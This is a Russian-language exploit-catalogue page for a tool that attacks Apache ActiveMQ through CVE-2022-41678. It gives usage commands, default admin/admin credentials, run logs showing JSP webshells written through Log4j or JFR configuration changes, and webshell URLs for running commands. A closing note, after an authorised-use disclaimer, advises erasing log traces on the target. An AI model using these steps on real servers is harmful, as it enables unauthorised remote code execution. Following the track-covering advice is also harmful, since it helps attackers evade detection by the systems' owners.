Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-41678 — CVE-2022-41678 — это уязвимость удалённого выполнения кода в Apache ActiveMQ. Она позволяет атакующему через интерфейс JMX (Java Management Extensions) изменить конфигурацию Log4j или конфигурацию JFR (Java Flight Recorder), чтобы записать вредоносный JSP webshell в веб-каталог сервера, что в конечном итоге приводит к удалённому выполнению кода. | Kitploit
Инструменты/GitHubGitHub/urjack2025/cve-2022-41678
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

Репозиторий
2211 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2022-41678 — это уязвимость удалённого выполнения кода в Apache ActiveMQ. Она позволяет атакующему через интерфейс JMX (Java Management Extensions) изменить конфигурацию Log4j или конфигурацию JFR (Java Flight Recorder), чтобы записать вредоносный JSP webshell в веб-каталог сервера, что в конечном итоге приводит к удалённому выполнению кода.

Поделиться

Инструмент эксплуатации Apache ActiveMQ CVE-2022-41678

Описание уязвимости

Справочный документ: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 — это уязвимость удалённого выполнения кода в Apache ActiveMQ. Данная уязвимость позволяет атакующему через интерфейс JMX (Java Management Extensions) изменить конфигурацию Log4j или JFR (Java Flight Recorder) и таким образом записать вредоносный JSP-веб-шелл в веб-каталог сервера, что в итоге приводит к удалённому выполнению кода.

Эта уязвимость затрагивает несколько версий Apache ActiveMQ; конкретные затронутые версии зависят от использования конфигураций Log4j и JFR.

Требования к окружению

  • Python 3.6 и выше
  • Установка необходимых зависимостей:
    root@kitploit:~
    pip install requests
    
  • На целевом сервере ActiveMQ должен быть включён интерфейс JMX (обычно доступен по пути /api/jolokia/)
  • Атакующему необходимо знать имя пользователя и пароль консоли ActiveMQ (по умолчанию обычно admin/admin)

Использование

Базовое использование

Использование учётных данных по умолчанию admin/admin и автоматически определяемого способа эксплуатации:

root@kitploit:~
python exp.py http://target:8161

Также можно указать имя пользователя и пароль с помощью параметров -u и -p:

root@kitploit:~
# 使用 Log4j
python exp.py -u admin -p admin http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

Помимо способа эксплуатации Log4j, используемого по умолчанию, можно указать способ эксплуатации JFR с помощью параметра --exploit jfr.

root@kitploit:~
# 使用 JFR 方式
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

Проверка результата эксплуатации

После успешной эксплуатации можно выполнять команды, обращаясь по следующим URL:

root@kitploit:~
# Log4j 方式写入的 webshell
http://target:8161/admin/shell.jsp?cmd=命令

# JFR 方式写入的 webshell
http://target:8161/admin/shelljfr.jsp?cmd=命令

Например, чтобы выполнить команду id:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

Описание параметров инструмента

ПараметрСокращениеТипЗначение по умолчаниюОписание
--username-uстрокаadminИмя пользователя консоли ActiveMQ
--password-pстрокаadminПароль консоли ActiveMQ
--exploit-eстрокаautoСпособ эксплуатации, допустимые значения: auto, log4j, jfr
url-строка-URL-адрес целевого ActiveMQ (обязательный параметр)

Примечания

  1. Данный инструмент предназначен только для исследований в области безопасности и авторизованного тестирования; не используйте его на неавторизованных системах.
  2. После успешной эксплуатации инструмент пытается восстановить исходную конфигурацию Log4j, чтобы минимизировать влияние на целевую систему.
  3. Если на целевой системе действуют ограничения сетевого доступа, возможно, потребуется скорректировать сетевые настройки, чтобы обеспечить доступ к интерфейсу JMX цели.
  4. Разные версии ActiveMQ могут иметь разные пути и конфигурации; возможно, потребуется скорректировать пути в инструменте с учётом конкретной ситуации.
  5. Инструмент работает через интерфейс JMX, поэтому необходимо убедиться, что на целевом ActiveMQ этот интерфейс включён.
  6. Запуск этого инструмента может оставить записи в журналах на целевой системе; позаботьтесь об удалении соответствующих следов.
Скачать инструмент